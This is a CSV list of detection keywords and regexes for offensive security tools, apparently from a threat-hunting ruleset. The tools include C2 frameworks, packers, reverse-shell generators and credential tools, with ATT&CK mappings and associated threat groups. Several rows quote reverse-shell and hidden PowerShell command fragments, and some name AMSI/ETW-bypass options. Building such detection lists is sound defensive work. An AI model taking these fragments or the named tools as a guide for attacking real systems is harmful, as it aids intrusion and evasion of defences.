"* netbus-info.nse*",".{0,1000}\snetbus\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2290"
"* netbus-version.nse*",".{0,1000}\snetbus\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2291"
"* --netcat-port *",".{0,1000}\s\-\-netcat\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","2293"
"* NetClone.exe*",".{0,1000}\sNetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","2294"
"* --netreactor-control-flow-obfuscation *",".{0,1000}\s\-\-netreactor\-control\-flow\-obfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2295"
"* --netreactor-incremental-obfuscation *",".{0,1000}\s\-\-netreactor\-incremental\-obfuscation\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2296"
"* --netreactor-obfuscate-public-types *",".{0,1000}\s\-\-netreactor\-obfuscate\-public\-types\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2297"
"* --netreactor-stealth-mode *",".{0,1000}\s\-\-netreactor\-stealth\-mode\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2298"
"* netripper*",".{0,1000}\snetripper.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2299"
"* NetRipper.dll*",".{0,1000}\sNetRipper\.dll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","2300"
"* new Sh('127.0.0.1',9000)*",".{0,1000}\snew\sSh\(\'127\.0\.0\.1\',9000\).{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#content","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","2304"
"* --NewCertPath *.pfx --NewCertPassword *",".{0,1000}\s\-\-NewCertPath\s.{0,1000}\.pfx\s\-\-NewCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","2305"
"* NewLocalAdmin(*",".{0,1000}\sNewLocalAdmin\(.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","2306"
"* nexpose-brute.nse*",".{0,1000}\snexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2307"
"* nfs-ls.nse*",".{0,1000}\snfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2308"
"* nfs-showmount.nse*",".{0,1000}\snfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2309"
"* nfs-statfs.nse*",".{0,1000}\snfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2310"
"* NiceRAT.py*",".{0,1000}\sNiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","2312"
"* nightCrawler.ps1*",".{0,1000}\snightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","2313"
"* nikto.pl *",".{0,1000}\snikto\.pl\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","0","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","2314"
"* nimcrypt*",".{0,1000}\snimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","2315"
"* --nimcrypt2-llvm-obfuscator *",".{0,1000}\s\-\-nimcrypt2\-llvm\-obfuscator\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2316"
"* --nimsyscall-hellsgate *",".{0,1000}\s\-\-nimsyscall\-hellsgate\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2319"
"* --nimsyscall-noamsi *",".{0,1000}\s\-\-nimsyscall\-noamsi\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2320"
"* --nimsyscall-obfuscate *",".{0,1000}\s\-\-nimsyscall\-obfuscate\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2321"
"* --nimsyscall-obfuscatefunctions *",".{0,1000}\s\-\-nimsyscall\-obfuscatefunctions\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2322"
"* --nimsyscall-peinject *",".{0,1000}\s\-\-nimsyscall\-peinject\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2323"
"* --nimsyscall-reflective *",".{0,1000}\s\-\-nimsyscall\-reflective\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2324"
"* --nimsyscall-remoteinject *",".{0,1000}\s\-\-nimsyscall\-remoteinject\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2325"
"* --nimsyscall-remotepatchamsi *",".{0,1000}\s\-\-nimsyscall\-remotepatchamsi\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2326"
"* --nimsyscall-remotepatchetw *",".{0,1000}\s\-\-nimsyscall\-remotepatchetw\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2327"
"* --nimsyscall-remoteprocess *",".{0,1000}\s\-\-nimsyscall\-remoteprocess\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2328"
"* --nimsyscall-selfdelete *",".{0,1000}\s\-\-nimsyscall\-selfdelete\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2329"
"* --nimsyscall-shellcode *",".{0,1000}\s\-\-nimsyscall\-shellcode\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2330"
"* --nimsyscall-sleepycrypt *",".{0,1000}\s\-\-nimsyscall\-sleepycrypt\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2331"
"* --nimsyscall-syswhispers *",".{0,1000}\s\-\-nimsyscall\-syswhispers\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2332"
"* Ninja.py*",".{0,1000}\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","2333"
"* nje-node-brute.nse*",".{0,1000}\snje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2336"
"* nje-pass-brute.nse*",".{0,1000}\snje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2337"
"* --nla-redirection-host * --nla-redirection-port *",".{0,1000}\s\-\-nla\-redirection\-host\s.{0,1000}\s\-\-nla\-redirection\-port\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","2338"
"* nntp-ntlm-info.nse*",".{0,1000}\snntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2339"
"* NoAmsi.ps1*",".{0,1000}\sNoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2340"
"* -NoBase64 *",".{0,1000}\s\-NoBase64\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2341"
"* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2342"
"* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2343"
"* --no-bruteforce --continue-on-success*",".{0,1000}\s\-\-no\-bruteforce\s\-\-continue\-on\-success.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2344"
"* --no-bruteforce --continue-on-success*",".{0,1000}\s\-\-no\-bruteforce\s\-\-continue\-on\-success.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2345"
"* -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8*",".{0,1000}\s\-NoExit\s\-Command\s\[Console\]\:\:OutputEncoding\=\[Text\.UTF8Encoding\]\:\:UTF8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","2347"
"* --no-http-server -smb2support -t * -c *",".{0,1000}\s\-\-no\-http\-server\s\-smb2support\s\-t\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2348"
"* --nomain -d:exportDll --passL:*",".{0,1000}\s\-\-nomain\s\-d\:exportDll\s\-\-passL\:.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","2350"
"* -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.*",".{0,1000}\s\-NoP\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Command\sNew\-Object\sSystem\.Net\.Sockets\..{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","2351"
"* -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient*",".{0,1000}\s\-NoP\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Command\sNew\-Object\sSystem\.Net\.Sockets\.TCPClient.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","2353"
"* -NoP -sta -NonI -W Hidden -Enc *",".{0,1000}\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Enc\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2354"
